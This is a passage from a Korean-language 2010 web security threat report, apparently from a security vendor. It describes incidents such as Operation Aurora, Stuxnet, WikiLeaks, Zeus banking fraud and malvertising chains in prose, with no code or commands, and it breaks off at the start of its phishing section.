목차 주요 내용 2 웹 업데이트 4 소개 4 미끼 페이지의 신규 소재 : 죽음, 각종 사건 및 재해 4 오로라 악성코드 공격(Operation Aurora) 6 스턱스넷(Stuxnet) 7 위키리크스(Wikileaks) 8 온라인 사기 및 제우스(Zeus) 9 악성 광

Transcription

1 >

2 목차 주요 내용 2 웹 업데이트 4 소개 4 미끼 페이지의 신규 소재 : 죽음, 각종 사건 및 재해 4 오로라 악성코드 공격(Operation Aurora) 6 스턱스넷(Stuxnet) 7 위키리크스(Wikileaks) 8 온라인 사기 및 제우스(Zeus) 9 악성 광고 공격 11 피싱 13 소셜 네트워킹 17 주요 웹 카테고리 20 소셜 네트워킹의 주요 카테고리 23 맬웨어를 호스팅하는 주요 카테고리 26 주요 웹 공격 28 새로운 웹 위협이 발생한 처음 몇 시간 31 허위 경보 33 주요 인터넷 사기 사건 38 모바일 단말의 성장 39 DLP 업데이트 41 위키리크스(Wikileaks) 세부 사항 41 데이터 거버넌스의 몇 가지 교훈 42 사건 보고서 및 트렌드 44 웹 메일 업데이트 47 지속적인 사용 감소 47 요약 49 부록 51 클라우드 기반 커뮤니티 웹 방어 51 개인 사용자를 위한 K9 웹 보호 프로필 년의 11가지 웹 보안 전망 55 참고 자료 58 1 < >

3 주요 내용 동적 웹 링크는 사이버 범죄와 웹 위협 전송에 있어서 사회 공학 기법 다음으로 강력한 수단입니다. 사이버 범죄의 모든 미끼 사이트에는 맬웨어 전송을 감지하여 차단하기 어렵도록 페이로드 서버를 변경할 수 있는 동적 웹 링크가 있습니다. 지난 해 맬웨어 전송은 대부분이 해킹을 통하여 유명한, 신뢰받는 사이트들이 이용되었습니다. 따라서 기존의 웹 필터링 솔루션에서는 문제없는 사이트로 분류되어 대부분이 차단되지 않아 많은 피해를 입혔습니다 이 보고서와 특정 사례들은 데스크톱 AV와 같은 일반적인 방어 체계는 웹 공격이 시작된 처음 몇 시간 이내에 거의 보호 기능을 제공하지 못 하는 것을 보여줍니다. 이에 반해 실시간 웹 방어 체계는 새로운 웹 링크와 콘텐츠에 대해 실시간으로 인식하는 대규모 사용자 커뮤니티를 활용하여 실시간 웹 위협을 보다 빠르게 찾아낼 수 있습니다. 이 방어 체계에서는 보안 전문가들이 연구한 광범위한 방어 수단과 분석이 활용됩니다. 동적 웹 링크는 공격에 대한 대응 기술로 웹 위치 탐색, 변조 탐지, 샌드박싱, 콜-홈 분석 등 새로운 방법이 필요합니다. 지난 10여 년 동안 파일 해시 값 또는 서명이 위협 방어의 핵심 요소였습니다. 세분화된 웹 구조를 통해 맬웨어, 익스플로이트 키트, 피싱, 사기 및 허위 소프트웨어가 전송됨에 따라 이제 웹 URL에 대한 방어 체계가 도입되고 있습니다. 바이러스 백신을 항상 활성화하여 알려진 위협으로부터 대비하고 실시간 웹 방어를 추가하여 동적 웹 링크 위협에 대한 차단이 필요합니다. 사용자가 중요한 금융 계정 등에 동일한 사용자 인증 정보를 사용한다는 사실을 바탕으로 피싱 공격은 이제 보다 쉬운 웹 계정에 집중되고 있습니다. 지난 해에는 대인 관계를 중심으로 한 소셜 네트워킹, 성인 콘텐츠, 사교적인 네트워킹 사이트가 주도했습니다. 올해는 소셜 네트워킹이 4위를 차지하였고, 비즈니스 및 경제 분야가 블로그 등 사적인 사이트보다 더 높은 순위를 보였습니다. 예상한 대로, 소셜 네트워킹이 웹 통신을 주도함에 따라 웹 메일은 하위 순위로 밀려났습니다. 악성 광고 사이버 범죄는 온라인 광고 시스템에서 신뢰할 수 있는 도메인을 설정한 후, 이 도메인의 동적 웹 링크로부터 맬웨어 페이로드를 준비합니다. Kaspersky researchers1에 따르면 2010년은 맬웨어의 진화를 고려할 때 2009년과 크게 다르지 않았다고 합니다. 2010년은 Microsoft를 밀어낸 Adobe 와 Apple에서 주도한 '보안 취약의 해'였으며 IE 웹 브라우저 내의 오로라 (Aurora) 취약성이 드러난 원년이기도 합니다. 2 < >

4 사이버 보안에 대한 주요 위협인 브라우저 공격과 봇넷과 함께 월별 맬웨어 탐지율은 2009년 이후 대체적으로 안정적인 상태를 유지하고 있습니다. 일부 유형의 맬웨어는 활동이 감소하기도 했습니다. 2010년 말에는 주요 봇넷이 더 이상 활동하지 않음에 따라 스팸 조차도 감소했습니다. 이는 공격 체계가 소셜 네트워킹으로 변화하고 있다는 신호입니다. 또한 피싱과 사기가 소셜 네트워킹 내에서 나타나며 더욱 세분화된 웹 링크를 사용하는 새로운 경향이 나타났습니다. 최고의 보안 스토리는 사보타주 공격인 스턱스넷(Stuxnet)가 체계적 데이터 관리와 데이터 유출 방지에 대해 주목하게 만든 위키리크스(Wikileaks) 였습니다. 제우스(Zeus)는 액세스 개인 정보를 수집하여 다양한 ACH 유선 사기 공격을 활성화하고 법원에서 온라인 금융 거래 당사자 간의 IT 보안 책임에 대한 분쟁을 일으켰습니다. 허위 바이러스 백신과 허위 소프트웨어가 여전히 최상위 웹 위협의 순위를 유지하였으며, 악성 광고가 검색 엔진 포이즈닝을 근소한 차이로 이겼습니다 ipod의 1년 판매량인 100만대 이상을 단 한달만에 달성한 1개월 동안 100만대 이상 판매한 ipad는 올해의 혁신 기술로 선정되었습니다. 모바일 기기와 스마트폰으로 인해 다양한 운영 체제와 웹 액세스 방법이 생겨남으로써 그에 따른 보호 체계가 요구됩니다. 또한 3세계 국가에서도 웹 정보를 사용 가능하게 하고 현지 및 지역의 브랜드를 전 세계에 전파할 수 있게 되었습니다. 동적 웹 링크는 이제 전 세계에서 연결됩니다. Facebook은 7년 만에 전 세계의 인구의 1/12을 연결하고 있습니다. Facebook이 국가라면, 인구 수를 기준으로 중국과 인도에 이은 3위에 해당합니다. 온라인 커뮤니티는 사이버 범죄에서 관계를 활용할 수 있는 강력하고 신뢰할 수 있는 완벽한 조건을 갖추고 있습니다. 실시간 웹 방어가 자체적으로 만들어지고 있습니다. 이 보고서에서는 주요 웹 사건, 공격 방법 및 전송 기술을 검토하여 다양한 교훈을 제공합니다. 대부분의 인류를 연결하는 웹 커뮤니티의 탄생이 멀지 않았습니다. 3 < >

5 웹 업데이트 소개 올해 초에 아이티와 칠레에서 대재앙적인 지진이 일어났으며, 사이버 범죄에서 허위 웹 사이트를 만들어 도움을 주려는 개인과 조직으로부터 기부금을 모금하는 데 악용했습니다. 적십자에서는 이러한 위험한 웹 환경을 피하기 위해 셀룰러 네트워크의 결제 시스템을 통한 휴대폰 기부를 선택했습니다. 이러한 선택과 개인 후원자를 보호하려는 조치는 칭찬받아야 합니다. 2010년 동계 올림픽에서 그루지야의 루지 선수가 사망하는 불행한 사건이 발생했습니다. 그리고 걸프 오일 누출 사건은 엄청난 환경 재해를 유발하여 걸프 지역의 경제에 엄청난 충격을 주었습니다. 또한 매몰된 칠레 광부들이 성공적으로 구조되었으며 마지막 인부가 구출되는 장면은 전세계에 드라마를 연출했습니다. 스턱스넷(Stuxnet)은 이란에서 우라늄 농축 원심분리기에 영향을 미치는 집중 사보타주를 목표로 상상에만 있던 공격 아이디어를 실현했습니다. 위키리크스 (Wikileaks)는 정보 유출을 재정의하고 체계적 데이터 관리에 대한 초점을 바꾸어 놓았습니다. 2010년을 보내면서 Facebook 창시자인 Mark Zuckerberg 는 Time지에서 올해의 인물로 선정되었습니다2. Facebook은 현재 5억 5천만 명의 사용자를 75개 언어로 연결하며 매일 약 700,000명씩 늘어나고 있습니다. 2010년에는 일부 성공적인 좋은 소식도 있었지만 충격적이고, 불행한 뉴스는 넘쳐나서 많은 사람을 웹 사이트, 온라인 미디어 및 숨겨진 웹 위협으로 이끌었습니다. 미끼 페이지의 신규 소재 : 죽음, 각종 사건 및 재해 동적 웹 링크는 사이버 범죄에서 인간의 기억, 관심사 또는 타인의 운명 등을 통해 사용자의 행동을 유발하는 미끼로 악용되는 가장 강력한 도구입니다. 재해는 사이버 범죄에서 이익을 얻기 위해 웹 대상에 대한 동적 링크 경로인 허위 웹 사이트를 만들고 뉴스 광고와 인간의 관심사를 이용하는 데 악용되는 많은 미끼 중 하나입니다. 드라마와 죽음은 유명 인사, 지도자, 운동 선수, 유명한 개인 등과 함께 미끼로 널리 악용되고 있습니다. 많은 사람이 가장 충격적인 죽음으로 다이애나비, 마이클 잭슨 및 스티브 어윈의 죽음을 꼽습니다. 사이버 범죄의 관점에서 이들의 죽음은 웹 위협을 유도하는 동적 링크에 대한 좋은 미끼가 됩니다. 작년 한 해에만 이지 라이더로 유명한 Dennis Hopper, 코미디언 Leslie Nielsen, Happy Days에서 그의 아버지 역할을 한 명배우 Tom Bosley, Tony Curtis, Lynn 4 < >

6 Redgrave, James MacArthur(Hawaii Five-O의 "Danno"), 미션임파서블의 Peter Graves, 디자이닝 우먼의 Dixie Carter, Fess Parker(데이비 크로켓의 명배우), Yankees 소유주 George Steinbrenner, 피치맨 Billy Mays, 폴란드 대통령 Lech Kaczynski 등과 같은 유명 인사가 운명을 달리했습니다. 이들만큼 유명하지는 않지만 세그웨이(2륜 동력 장치)의 소유주인 Jim Heselden이 절벽 위에서 세그웨이를 타고 달리다가 30피트 아래로 추락하여 사망했으며 2010 월드컵 경기 결과 예언으로 유명해진 문어 Paul, 가수이자 배우이자 소시지 비즈니스맨인 Jimmy Dean, Gumby 창시자 Art Clokey, 밴쿠버 동계 올림픽에서 사망한 그루지야의 루지 선수 Nodar Kumaritashvili 등이 세상을 떠났습니다. 이러한 기사 중 일부에 관심을 가질 수 있습니다. 그러면 뉴스를 클릭하여 사진, 비디오 클립 등을 보면서 해당 인물이 자신의 삶에 미치는 영향을 곰곰이 생각해 볼 수 있습니다. 이러한 모든 온라인 행위가 다양한 형태의 맬웨어 전송 경로로 이용됩니다. 사회가 리치 미디어, 영화, 뉴스, 정치적 이벤트, 그러한 역할을 수행하는 사람 등으로 넘쳐나면서 죽음, 드라마, 재해 등을 대상으로 하는 미끼가 계속 늘어나고 있습니다. 소셜 네트워킹에 접속하고, Twitter를 통해 간단한 URL로 뉴스를 빠르게 전파하고, 몇 분 이내에 사이버 범죄를 실현할 수 있게 됨에 따라 기존의 방어 체계만으로는 방어하는 데 많은 어려움이 있습니다. 최종 사용자가 뉴스와 미디어에 집중하면서 동적 웹 링크를 통해 웹 위협을 전파할 수 있는 기회가 늘어나고 있습니다. 재해, 죽음 및 드라마는 몇 년을 주기로 등장하여 사이버 범죄의 미끼로 계속 악용되고 있습니다. 사용자와 리소스를 보호하려면 먼저 웹 콘텐츠 실시간 평가를 사용하여 언어를 평가하고 페이지 또는 사이트 및 웹 상관 관계를 범주화하는 토큰과 키워드를 이해함으로써 사전 예방적인 방어 체계를 구축하여 사이버 범죄에 대비할 수 있습니다. 업데이트 주기에 따른 정적 웹 평가는 너무 느려서 새로운 스토리와 배경 정보로 단 몇 분만에 사용자를 유인하는 현재의 초고속 웹 환경에는 적합하지 않습니다. 간단한 키워드 평가나 기타 편법을 사용하여 성적인 콘텐츠를 감지할 수도 있지만, 동적 웹 링크에 대한 실시간 평가를 사용하면 요청 당 여러 번의 평가를 통해 고유한 웹 콘텐츠를 식별하고 클라우드 서비스 내에서 이러한 방어를 조율하는 전문가를 활용하는 것이 가장 좋은 방법입니다. 5 < >

7 오로라 악성코드 공격(Operation Aurora) 이 공격은 오래 전부터 인지되었지만 2010년의 보안 화두가 되고 보호 기능 강화를 위해 방어 체계를 실행하여 스스로 진화하는 보안 취약성 악용으로 인해 주목 받게 되었습니다. 오로라 오퍼레이션3(해커 컴퓨터의 파일 폴더 제목)으로 명명된 이 공격은 IE 와 PDF를 모두 사용하여 기술, 금융 및 방어 업계의 약 34개 기업을 대상으로 실행되었습니다. 이 공격은 암호화, 은폐형 프로그래밍, Internet Explorer의 익스플로이트 등 전례 없는 공격으로 Google, Adobe 등과 같은 주요 기업에서 소스 코드를 수집했으며 나중에 CVE 라 명명되었습니다. 또한 악성 PDF 파일이 첨부된 이 공격에 포함되므로 분석 시 Adobe Acrobat/ Reader의 익스플로이트를 참조합니다. 오로라 공격은 특정 대상에 집중하고 최신 기술과 알려지지 않은 보안 취약성을 조합하여 사용했습니다. 이 공격은 2009년 12월 중순에 시작되어 2010년 1월 초순에 종료되었다고 알려져 있습니다. 2010년 1월 12일(화요일) 에 Google은 12월 중순에 매우 치밀한 공격을 감행하여 해커가 지적 재산을 훔치고 Gmail 계정에 액세스하려는 시도가 있었다고 발표했습니다. 몇 분 후에 Adobe는 1월 2일에 네트워크와 자사에서 관리하는 다른 기업에서도 치밀한 공격이 발견되었다고 블로그 포스트에 발표했습니다. 공격자는 10여 개 이상의 맬웨어와 다양한 수준의 암호화를 통해 공격을 감지하지 못하게 교란하고 일반적인 검색 방법을 우회함으로써 대상 네트워크에 깊숙이 침투하여 성공률을 높였습니다. 초기 코드는 공격을 활성화하는 3회 암호화된 셸 코드였습니다. 원격 호스트에서 암호화된 압축 페이로드를 다운로드하면 Hydraq 트로이목마가 이후의 공격에 포함되는 것으로 확인되었습니다. 프로그램 중 하나가 백도어를 개방하여 SSL 터널로 가장하는 암호화된 터널을 생성하여 검색을 회피했습니다. 그러면 공격자가 시스템을 제어하여 네트워크를 마음대로 탐색할 수 있습니다. 공격자는 시스템을 제어하여 수집된 정보를 활성화한 다음 텍사스, 일리노이 및 대만에 있는 명령 및 제어 서버를 통해 전송했습니다. 공격이 2009년 12 월 15일에 시작되어 명령 및 제어 서버가 종료된 2010년 1월 4일에 종료된 것 같습니다. 공격은 업무에 참여하는 IT 담당자 수가 적은 휴일에 맞춰졌습니다. IE 보안 취약성이 노출된 후 알려진 IE 보안 취약점을 사용 가능한 익스플로이트 6 < >

8 코드와 함께 사용하여 'me-too' 공격이 시작되었습니다. 언론과 온라인 뉴스 사이트의 과잉 반응과 외국 정부의 반응이 더해져서 오로라 취약성이 주목을 받게 되었습니다. 보안 위협 연구소에서 Google에서 공개 발표하기 이전에 맬웨어를 식별했지만 1차 공격은 더 이상 활성화되지 않았습니다. 익스플로이트를 활용한 2차 공격은 바이러스 백신 위협 분석을 통한 모든 웹 콘텐츠 분석을 통해 식별되었으며 식별된 맬웨어 소스와 콜-홈 도메인을 차단하여 후속 맬웨어 다운로드 또는 정보 수집을 봉쇄할 수 있었습니다. 초기 공격은 금융 이익을 노리는 사이버 범죄 조직에서 실시한 것이 아니었습니다. 사이버 범죄 공격이 절차를 무시하고 일부 단계를 애매하게 만들지 않는 경우도 있습니다. 이러한 공격은 공공 부문이 아닌 방위 산업에서 목격되는 것과 유사합니다. 2차 공격은 보다 일반적이고 예상한 유형으로 진행되어 인라인 방어와 웹 필터링 방어를 통해 고객 네트워크와 리소스를 보호할 수 있었습니다. 여기서 중요한 것은 선택적으로 분석하는 경우 성능은 향상되지만 보안 위험이 따르므로 모든 웹 콘텐츠를 바이러스 백신으로 분석해야 한다는 사실을 명심해야 합니다. 또한 웹 필터링 방어에서는 클라우드 기반 방어와 보안 전문가를 통해 알려진 맬웨어 호스트와 콜-홈 도메인을 차단할 수 있습니다. 2010년 1월 오로라 공격 이후에 고급 PDF 분석 프로그램과 활성 스크립트 도구가 개발되어 식별할 수 없는 웹 콘텐츠를 샌드박싱할 수 있는 기능이 향상되었습니다. 그 결과 매우 효율적인 방어가 가능해져서 현재 이러한 도구가 PDF 파일뿐만 아니라 다양한 웹 콘텐츠에서 활성화되어 있습니다. 블루코트 연구소에서 전 세계 7천만 명 이상의 사용자가 실시간 입력하는 웹 콘텐츠를 모니터링하여 분석합니다. 실제로 모든 공격은 많은 콘텐츠를 얻거나 정보를 제공하기 위해 원격 호스트에 접속합니다. 이러한 동적 링크와 요청이 효율적인 웹 방어 필터링을 위한 열쇠가 됩니다. 스턱스넷(Stuxnet) 방위 산업급의 치밀한 공격이 위협 환경의 주요 단계에 적용되며 가능한 지속적인 변화를 시도하여 글로벌 제어 기술인 원자력 산업에 영향을 미쳤습니다. 스턱스넷(Stuxnet)은 6월에 검색되었을 때 공격의 치밀함으로 공격 수준을 높였습니다. 몇 개월 후 11월 말에 이란에서 우라늄 농축 원심분리기가 공격 받고 손상된 것으로 확인되었습니다. 스턱스넷(Stuxnet)은 모든 IT 경영자에게 7 < >

9 단호하고 집요하며 잘 갖추어진 해커가 매우 정교하고 복잡한 시스템을 손상시킬 수 있다고 경고합니다. 스턱스넷(Stuxnet)은 독특하게도 기존의 웹 위협 패턴과 공격 기법을 따르지 않았습니다. 그 점에서는 작 공격도 마찬가지입니다. Bruce Schneier의 Forbes.com 분석4에서는 공격 당한 Windows 시스템이 USB를 통해 스턱스넷(Stuxnet) 웜에 감염되면, 4개의 공개되지 않은 매우 중요한 제로데이 취약성을 활용(현재는 모두 패치됨)하여 스턱스넷(Stuxnet) 이 Siemens에서 생산한 특정 모델의 PLC(Programmable Logic Controller)와 관련 컨트롤러 소프트웨어를 찾는다는 사실을 밝혀냈습니다. 스턱스넷(Stuxnet)은 훔친 인증서를 사용하여 Windows에 자체 드라이버를 설치함으로써 합법적으로 가장한 후 두 제어 서버에서 업데이트를 확인합니다. P2P 업데이트 방식을 사용하므로 항상 최신 버전이 사용됩니다. 7월에 발견된 이 웜은 2012년 6월 24일에 확산을 멈추고 자체적으로 삭제되도록 종료 날짜가 지정되어 있습니다. 9월까지는 감염된 시스템의 60%가 이란에서 발견되었습니다. 현재는 주요 바이러스 백신 솔루션에서 스턱스넷(Stuxnet)을 감지하여 치료할 수 있습니다. 신기한 것은 스턱스넷(Stuxnet)이 무차별적으로 확산되거나, 신용카드 정보를 훔치거나, 사용자 인증 정보에 액세스하거나, 감염된 컴퓨터를 조직적인 봇넷으로 모으지 않는다는 사실입니다. 사이버 범죄에서는 이익을 극대화하기 이해 각 취약점을 개별적으로 활용하는 데 반해 이 웜은 자체적으로 비용을 부담하여 알려지지 않은 4개의 제로데이 취약점을 모두 함께 이용했습니다. 스턱스넷(Stuxnet)은 사보타주를 수행했지만, 착취나 재정적인 이익의 목적으로는 사보타주를 협박하지 않았습니다. 스턱스넷(Stuxnet)은 출처를 숨기기 위해 단서를 남겼으며 지금도 숨겨져 있을 것입니다. 이 공격은 발전되고 상상도 못했던 컴퓨터 위협이 실현되고 있다는 교훈을 주었습니다. 우리는 이제 새로운 한계점에 도달하여 원자력 시대를 열었던 뉴멕시코의 Trinity 테스트를 반영합니다. 위키리크스(Wikileaks) 데이터 유출 방지에 대한 이 전형적인 사건이 뉴스 미디어와 정치적 관점에 불을 지피고 코미디 소재로 등장함에 따라 체계적 데이터 관리에 대한 관심이 높아졌습니다. 8 < >

10 2010년은 위키리크스에서 미국무부 정보를 공개하는 것으로 대미를 장식했습니다. 실제 위키리크스 게시를 미연에 방지한 국무부의 사과를 기점으로 정보를 제공하는 다양한 미러 사이트의 출현, 위키리크스에 대한 기부를 중단시킨 결제 사이트에 대한 봇넷 공격, SNL(Saturday Night Live)에서 Bill Hader의 연속적인 Julian Assange 패러디(온디맨드 비디오 다운로드) 등 연쇄적인 반응이 시작되었습니다. 최악의 데이터 유출 사건 중 하나로 간주될 수 있는 것은 사이버 범죄를 위한 다양한 미끼를 만들고, 사이트에 동적 링크를 삽입하고, 허위 검색 엔진 결과를 대상에게 제공하고, 숨겨진 맬웨어를 다운로드하여 정보를 수집함으로써 수익을 실현할 가능성이 있다는 점입니다. 블루코트는 11월 한 달 동안 검색 엔진 결과를 감염시키는 데 사용된 주요 링크 팜을 분석하여, 휴일 쇼핑 시즌에 대한 주요 검색어에 초점이 맞춰져 있다는 사실을 확인했습니다. 맬웨어 페이로드에 대한 미끼로 위키리크스를 거의 활용하지 않았습니다. 이 주제는 이미 다양한 정부 기관의 관심을 충분히 받았습니다. 그렇다면 왜 이 분석에서 벗어나지 못할까요? 위키리크스와 관련 미러 웹 사이트는 유출된 기밀 정보에 대한 다른 문제도 야기했습니다. 일부 고객은 기밀 데이터가 네트워크로 다운로드되어 새로운 감사 문제와 추가 비용을 발생시킨다는 점과 비즈니스 관계에 대한 잠재적 손실을 우려했습니다. 비슷한 시나리오가 많은 양의 부적절한 이미지 생성이나 금융 사기에 악용될 수 있는 사용자 인증 정보와 함께 훔친 신용 카드 번호가 나열된 파일에서도 나타납니다. 사용자가 웹에서 다운로드하여 악용할 수 있는 기밀 정보나 불쾌한 정보로 인해 다양한 사회적, 비즈니스적 문제가 야기될 수 있으며 이에 대한 많은 전망도 나오고 있습니다. 위키리크스와 데이터 유출 사건에 대한 자세한 내용은 아래 DLP 업데이트 부분을 참조하십시오. 온라인 사기 및 제우스(Zeus) 다양한 지역의 지방 자치 정부와 기업의 상업적 사기에 대한 보호가 제외됨에 따라 법원에서 재정적 손실에 대한 보안 책임과 관련한 청문회가 실시되었습니다. 제우스 맬웨어는 대상을 모바일 장치로 전환하여 데스크톱 컴퓨터에서 다져진 방법에 따라 금융 계정에 대한 사용자 인증 정보를 얻기 위해 SMS 공격을 시도했습니다. 2010년에 시도된 많은 통신 사기는 IT 보안에 대한 책임 소재(고객 또는 금융 기관)와 관련하여 오래된 UCC(통일상사법전)에 현안 9 < >

11 과제를 제시했습니다. 키를 로깅하여사용자 인증 정보를 수집하는 제우스와 기타 형태의 맬웨어가 웹 전반의 다양한 곳에서 전송될 수 있습니다. 이러한 다운로드를 차단하고 콜-홈 시도를 감지하는 것이 사전 예방적 웹 방어 체계의 핵심입니다. 대기업 및 중소 기업을 비롯하여 교회와 같은 조직이 온라인 사기와 대규모 재정 손실의 먹잇감으로 전락했습니다. 대부분 손실 금액이 400,000달러 이내이고 최대 3백만 달러에 이르는 경우도 있습니다5. 고객은 개인, 조직 또는 비즈니스 온라인 활동에 대한 ACH 거래를 이중적으로 제어하도록 요구합니다. 소비자는 대부분 법에 의해 보호되지만 기업과 지방자치 정부에 대해서는 상업적 사기를 제외하고 있습니다. 사이버 범죄에서는 사용자 인증 정보 키를 로깅하고 자신이 제어하는 계정에 대한 알림 설정을 변경할 수 있습니다. 이제 모바일 장치로 대상을 전환하여 SMS 관련 공격을 시도하고 있습니다. 텍사스에서는 조심하십시오6. Texas, Gregg County 세무서에서 제우스 트로이 목마에 감염되어 러시아 사이버 범죄자에게 ACH 거래에 대한 총 690,000달러의 지방세를 사기 당했지만 200,000달러를 제외한 전액을 환수했습니다. 공격은 11월 23일에 발생되어 미국에서 소매점을 제외한 대부분의 기업이 업무하는 추수감사절 휴일 다음 날인 금요일에 발견되어 차단되었습니다. 텍사스 은행과 테네시 은행 간의 거래 과정에서 국제적인 공격을 당하여 사이버 범죄자가 ACH 라우팅과 계정 번호를 변경했습니다. 수사관이 모스크바의 웹 사이트에 대한 맬웨어를 역추적했습니다. 모든 ACH 거래 활동이 자치주 쪽에서 시작되어 개인 사용자 인증 정보가 손실된 것을 확인했습니다. 세무서에서는 모든 온라인 ACH 자금이체를 중단하고 서류 거래로 다시 전환했습니다. 더 많은 조직이 제우스와 ACH 온라인 사기를 당했습니다. 법원에서의 IT 보안 책임 소재에 대한 논쟁 대신 양 당사자는 사전 예방적 방어를 전개해야 합니다. 문제의 리소스가 자신의 것이라면 스스로 합리적인 방어 체계를 전개하여 자신과 고객을 보호할 책임이 있습니다. 실시간 웹 평가, 클라우드 호스팅 방어 및 웹 인텔리전스 전문가를 통해 맬웨어 다운로드, 콜-홈 요청 및 기타 동적 링크와 알 수 없는 콘텐츠를 차단하여 리소스를 보호할 수 있습니다. 우리는 온라인 시대가 되면서 사이버 범죄자가 기회를 악용하게 되었습니다. 10 < >

12 키 로거와 사용자 인증 정보 유출을 예상하여 대비하십시오. 이중적인 제어와 대역외 인증을 전개하고 계정을 신중하게 모니터링하십시오. 악성 광고 공격 사이버 범죄자는 끈질기게 수 개월 동안 신뢰할 수 있는 광고 인프라를 구축하고 계획된 최적의 시간에 사용자에게 미끼를 제공하여 과거의 평가 등급대로 방어 체계에 침투합니다. 악성 광고(Mal-ware Ad-vertising) 공격은 매우 끈질기고 창의적이며 쉬지 않습니다. 예를 들어 11월 초에 하루를 선택하고 대상을 선별하여 숨겨진 맬웨어 페이로드를 전송하는 깨끗한 평가를 받은 맬웨어가, 생성된 지 약 6개월 된 상대적으로 새로운 광고 도메인에서 몇 번 확인되었습니다. 이 맬웨어는 다음 날 사라졌습니다. 광고 네트워크에서 깨끗한 이미지를 쌓아서 분류 등급을 받은 다음 여러 차례의 맬웨어 테스트를 통과하여 사이버 범죄자는 웹 광고 구조에서 매우 중요하고 신뢰할 수 있는 입지를 참을성 있게 구축한 후 공격을 게시합니다. 9월의 분석에서는 OpenX 광고 서버에서 익스플로이트 관련 악성 광고에 대한 급격한 트래픽 증가가 감지되었는데 이 서버에서는 사용자의 언어가 맬웨어 전송의 결정 요인이었습니다. 이 악성 JavaScript는 브라우저를 공격 사이트에 릴레이하기 전에 쿠키를 활성화했습니다. 사용자의 언어가 2문자 화이트리스트에 있는 경우 공격 사이트를 가리키는 악성 iframe이 전송되지 않았습니다. 허위 바이러스 백신은 왜 사용자가 이해할 수 없는 언어로 제공되어 효율성을 저하시키고 사용자 환경을 어지럽히며 현지 경찰에 체포되는 것일까요? 또 한 예로 악성 광고 공격이 고도로 암호화된 JavaScript를 사용하여 Twitter 검색 요청에 등재된 맬웨어 서버에 연결된 많은 이탈리아 웹 사이트에서 실행되었습니다. 맬웨어 전송 과정에서 Twitter 검색 결과를 사용하여 맬웨어를 전송하는 동안 매일 임의의 도메인 이름을 생성했습니다. 이 공격은 Twitter 검색 결과와 유사한 도메인을 사용하여 매우 창의적으로 진행되었습니다. 여기서 악성 광고에 대한 웹 방어를 위해 실시간 동적 링크 평가가 반드시 필요하다는 교훈을 얻게 됩니다. 다른 악성 광고 기법으로는 맬웨어 페이로드를 임의적으로 전송하여 후속 조사에서 검색되지 않도록 하는 방법이 있습니다. 4월에 인도와 뉴저지의 두 지역에 전파된 악성 광고를 검색했습니다. 웹 사이트에는 일부 광고 네트워크가 잘 알려지지 않은 소규모의 신규 광고 도메인에 아웃소싱된 유명한 대형 광고 네트워크 도메인으로 핸드오프되어 있었습니다. 11 < >

13 사용자의 흥미를 유발하는 많은 뉴스 미끼와 광고가 있는 주요 뉴스 사이트 (screenindia.com)를 방문했습니다. 광고에 대한 제3자 링크 중 하나가 유명한 대형 광고 네트워크인 doubleclick.net으로 이동했습니다. doubleclick.net 에서 일부 JavaScript가 광고 네트워크의 신뢰할 수 있는 영역처럼 보이는 daniton.com으로 연결했습니다. daniton.com을 처음 방문하면 광고 사이트에서 배너 광고를 제공하지만 이 또한 고도로 암호화된 JavaScript입니다. 이 스크립트는 어떠한 후속 시도도 하지 않는 임의 전송을 위한 데모입니다. daniton.com의 고도로 암호화된 JavaScript는 원래의 호스트 페이지에 iframe 태그를 삽입합니다. iframe은 사용 중인 Acrobat Reader의 버전을 확인한 후 사용자의 웹 브라우저에 실제 맬웨어 서버(매일 임의로 변경됨)를 호출하여 PDF 익스플로이트 파일을 다운로드하도록 요청합니다. 이 공격의 경우 4월에 이 공격이 개시된 지 약 1년이 지난 시점에서 VirusTotal.com에 표시된 40개 이상의 바이러스 백신 엔진 중 16개에서 PDF 익스플로이트를 감지했습니다. 바이러스 백신 엔진 중 90% 이상이 1년 된 공격을 감지했으면 모두 안전했을 것입니다 여기서는 사용자가 웹 콘텐츠에 액세스하기 전에 최신 패치를 적용하므로 웹 게이트웨이에서 사용자 에이전트 유형과 버전을 엄격하게 준수해야 한다는 교훈을 얻었습니다. 또한 이 광고 네트워크는 악성 페이로드를 전송하는 것으로 확인되기 이전에 1월부터 4월초까지 운영되어 깨끗한 신뢰 등급과 분류 등급을 받았습니다. 미끼의 위력에 대해서는 이 보고서의 시작 부분에서 이미 설명했습니다. 이러한 경로에 따라 동적 링크 검사를 반드시 실행하여 맬웨어 전송을 차단하십시오. 2010년 4월말에 Google은 허위 바이러스 백신이 광고를 통해 전송되는 맬웨어의 50%를 차지한다는 허위 바이러스 백신 배포7 분석 결과를 발표했습니다. 사이버 범죄자는 noindex, nofollow, noarchive 태그와 http 참조 페이지를 사용하여 Google 플레이북을 통해 일반 콘텐츠 은폐 기술을 사용해야 한다는 것을 잘 알고 있습니다. 웹 크롤러는 사이버 범죄자가 맬웨어를 전파하는 데 사용하는 http 참조 페이지나 사용자 에이전트를 사용하지 않기 때문에 이러한 유형의 웹 모니터링이나 연구소의 부분 동적 링크 체인 분석에 트랙을 숨겨서 위장할 수 있습니다. 여기서 웹 사이트를 모니터링하거나 탐색하는 웹 방어 체계에서 표면 아래에 숨겨진 실제 웹 위협을 감지하지 못하는 경우가 있다는 교훈을 얻게 됩니다. 사용자로 구성된 완벽한 동적 링크 체인을 실시간으로 사용하면 전송되는 웹 콘텐츠를 완벽하게 조사할 수 있습니다. 12 < >

14 악성 광고에 대한 최종 결론: IT 리소스가 적고 공격이 알려질 가능성이 낮은 주말에 공격을 개시하는 경향이 있습니다. 좋은 예로, 2009년 9월에 NY Times 악성 광고 사건으로 유명한 공격이 있었습니다. 이 공격에서는 금요일 늦은 오후 또는 주말 이른 시간에 NY Times 광고를 Vonage 광고로 대체하여 방문자에게 바이러스 경고를 제공하는 악성 광고를 통해 허위 바이러스 백신을 제공하였습니다. 랩톱과 원격 사용자가 주말에 감염된 상태로 월요일 아침에 사무실로 복귀할 수 있습니다. 웹 보안은 365일 24시간 연중무휴로 작동하고 웹 액세스는 어디에서든 이루어지므로, 이 사건으로 인해 공통의 클라우드 기반 웹 방어를 통해 원격 사용자와 사무실 근로자를 보호하는 중요한 웹 방어 전략이 생겼습니다. 피싱 소셜 네트워킹 환경으로 전환됨에 따라 피싱 공격은 사용자들이 중요한 금융 서비스 사이트에서 동일한 사용자 인증 정보를 사용한다는 점에 착안하여 널리 알려지지 않은 계정 정보를 찾고 있습니다. 기존의 피싱 공격은 금융 사이트를 모방하여 사용자 인증 정보를 수집하거나 사용자가 많은 온라인 쇼핑 사이트를 모방하여 신용카드 정보를 수집합니다. 예를 들어, 